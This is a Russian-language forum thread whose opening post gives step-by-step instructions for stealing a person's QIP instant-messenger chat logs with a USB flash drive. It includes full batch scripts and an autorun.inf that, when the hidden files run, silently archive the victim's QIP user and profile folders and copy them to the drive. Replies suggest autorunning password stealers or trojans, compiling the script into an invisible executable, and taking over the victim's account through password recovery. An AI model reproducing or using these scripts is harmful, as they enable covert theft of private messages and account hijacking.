Как с помощью USB Flash украсть логи QIP ?

Что для этого нужно?

1 Создать файл zzz.bat с следующим текстом


@Echo off
c:
chdir C:\Program Files\QIP\Users
g:\rar.exe a -r users > nul
copy users.rar g:\123 > nul
del users.rar > nul



где
@Echo off.......скрывает визуальный процес копирования
C:\Program Files\QIP\Users.......папка которую нада потянуть
g:\rar.exe a -r users > nul.......запуск rar для ускорения копирования
copy users.rar g:\123 > nul.......адрес куда тянем
del users.rar > nul.......удаляет созданый архив

если буква флеш диска не извесна можна нарисовать несколько вариантов

@Echo off
c:
chdir C:\Program Files\QIP\Users
e:\rar.exe a -r users > nul
copy users.rar e:\123 > nul
g:\rar.exe a -r users > nul
copy users.rar g:\123 > nul
h:\rar.exe a -r users > nul
copy users.rar h:\123 > nul
del users.rar > nul


2 Создаем файл autorun.inf с текстом

[autorun]
ShellExeCute="zzz.bat"


3 Копируем rar.exe (1файлик а не всю папку) из папки Program Files\WinRAR


4 Создаем папку с названием 123


5 Поместить это все 4 файла в корень флешки и сделать скрытыми.


PS: Эфективно ворует мелкие файлы потому как это почти не заметно происходит.
А вот с большыми врятли получится , при архивировании слишком уж долго висит консоль.
Буду рад если кому пригодится


источник:http://qiq.ru/26/03/2009/information/116842/kak_s_pomoschju_usb_flash_ukrast_logi_qip.html

PS:По моему интересный способ.


=============================================================
Для тех у кого путь логов теперь тут C:\Documents and Settings\Admin\ApplicationData\QIP\Profiles:



@Echo off
c:
chdir C:\Documents and Settings\Admin\ApplicationData\QIP\Profiles
g:\rar.exe a -r users > nul
copy Profiles.rar g:\123 > nul
del Profiles.rar > nul


видео

 

Лучше автораном запустить какую-нибудь прогу, ворующую пароли (помню были такие, которые через командную строку работали и сохраняли все пассы в файл) или, уж что там мелочиться, троян сразу.
Есть один досадный недочет, который опытный пользователь сразу обнаружит: по клику на диске запустится бат файл, но сам диск не откроется, хоть ты закликайся.
Ну и еще одно но - пользователи TotalCommander'a пролетают...

 

Антивирус ругаться начнет.

 

баяяян !! низнаю какой давности....
и что ты этим добьёшься ?! ровным щётом НИЧЕГО, так как логи как правило зашифрованы
и это кстатии для 2005 кипа... Infium держит логи в другом месте

 

стащю папку юзверс себе на машину ,и зайду в квип через его учетку,единственное что я не смогу - узнать пасс,в файле config.ini потому что квип постоянно меняет алгоритм шифрования.Но его можно узнать зайдя через эту учетку и ввести в данные свой email адрес, а потом воспользоваться системой напоминания пароля на соответствующих официальных сайтах icq или aim.

 

зачем изврат, если есть доступ к компу, идешь и воруешь логи в наглую, желательно без палева

 

ТС! Это действительно было на ачате! Кажется не в разделе аси а в статьях (точно я не помню). Ссылку я сейчс на тему искать не буду... но если хочешь то найду

 

путь логов теперь тут
C:\Documents and Settings\Admin\Application Data\QIP\Profiles

 

из-за частых вопросов снял видео.

 

согласен... бантик самое лучшее средство... я так хистори с асекю тырю.... пишеш 5 строк... зато доволен во всю=)

 

На dump регестрацию требует!

 

регистрация - такая большая трабла?

 

а что делать если логи хранятся не в Admin а в неизвестном пользователе?

 

можно ли сделать так чтоб флешка сама находила на компе расположение нужного файла, папки?

 

это всё правильно но чтоб окно не висело надо бат компилить в exe в режиме невидимости ..тогда никто не заметит происходящих процессов !

 

Прожку можно написать например на делфи, сделать ее невидимой и все, впринципе ничего сложного

 

Пробел

А если путь к файлу содержит пробелы? Например, папка Program files. bat - файл же может работать некорректно.
Так как юзверя обычно ставят систему на пустой диск, где больше нет папок с именем program, я лично всегда указываю путь таким образом.

Copy c:\progra~1\***\*** G:\123

 

Bat-файл спокойно может работать с длинными именами папок.

 

тупой способ конечно, но эффективный

 

Kotovas, ух ты! А кавычки для чего?